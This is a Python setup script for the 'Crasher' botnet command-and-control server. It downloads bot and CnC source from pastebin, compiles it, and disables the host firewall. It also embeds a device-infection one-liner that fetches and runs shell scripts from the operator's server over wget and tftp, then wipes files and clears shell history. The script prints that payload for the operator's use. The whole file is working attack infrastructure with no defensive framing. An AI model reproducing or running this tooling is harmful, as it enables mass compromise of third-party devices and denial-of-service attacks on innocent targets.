import subprocess

def cri(cmd):
    subprocess.call(cmd, shell=True)

def replace_line(file_name, line_num, text):
    with open(file_name, 'r') as file:
        lines = file.readlines()
    lines[line_num] = text
    with open(file_name, 'w') as file:
        file.writelines(lines)

print('\033[1;36m   _____               _               ')
print('\033[1;36m  / ____|             | |              ')
print('\033[1;36m | |     _ __ __ _ ___| |__   ___ _ __ ')
print('\033[1;36m | |    |  __/ _` / __|  _ \ / _ \  __|')
print('\033[1;36m | |____| | | (_| \__ \ | | |  __/ |   ')
print('\033[1;36m  \_____|_|  \__,_|___/_| |_|\___|_|   ')
print('\033[1;36m                                       ')
print('\033[1;37m[\033[1;36mCrasher\033[1;37m] \033[1;37mCnC AutoSetup \nDeveloped By \033[0;31mFlexingOnLamers\033[1;37m/\033[0;31mCri')

ip = input("\033[1;37mEnter Your Server IP:\033[1;35m")
user = input("\033[1;37mEnter Desired Username:\033[1;35m")
passw = input("\033[1;37mEnter Desired Password:\033[1;35m")
bport = input("\033[1;37mEnter Desired BotPort:\033[0;31m")
port = input("\033[1;37mEnter The Port You Want to screen on:\033[1;35m")

print('\033[1;35mInstalling Needed Dependencies..\033[1;37m')
cri('yum update -y')
cri('yum install python3-paramiko gcc screen nano wget httpd iptables perl -y;')
cri('yum install gcc cmake gmp gmp-devel libpcap-devel gengetopt byacc flex -y')
cri('yum install json-c-doc.noarch json-c.i686 json-c.x86_64 json-c-devel.i686 json-c-devel.x86_64 -y')
cri('yum install epel-release -y')
cri('yum install gengetopt -y')
cri('wget -q https://pastebin.com/raw/Hx6JmN35 -O crasher.c')
cri('gcc -o crasher crasher.c -pthread')
cri('rm -rf crasher.c')
cri('wget -q https://pastebin.com/raw/J2W0uHsi -O client.c')
cri('wget -q https://pastebin.com/raw/Ne69fRpz -O cc7.py')
cri('service iptables stop')
cri('service httpd restart')
cri('systemctl stop firewalld')
cri('httpd -k restart')
cri('httpd -k restart')
cri('pkill screen')

replace_line('client.c', 859,  'unsigned char *AllDemDupes[] = { "'+ ip +':'+ bport +'" };
')
replace_line('client.c', 861,  'char *infect = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";\n')
cri("echo " + user + " " + passw + " >> login.txt")
cri("python3 cc7.py client.c " + ip + "")
cri("screen ./crasher " + bport + " 1 " + port + "")

print('\033[1;37mT')
print('\033[1;35mcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://'+ ip +'/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp '+ ip +' -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g '+ ip +'; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *')
print('\033[1;37mThank you '+ user +' for using the \033[1;37m[\033[0;31mCrasher\033[1;37m] \033[1;37mCnC AutoSetup \n\033[0;31mPastebin\033[1;37m:\033[1;36mhttps://pastebin.com/u/flexingonlamers \n\033[0;31mGithub\033[1;37m:\033[1;36mhttps://github.com/AgentCri/  \n\033[0;31mEmail\033[1;37m:\033[1;36mcri@null.net \n\033[0;31mDiscord\033[1;37m:\033[1;36mCri#4614')
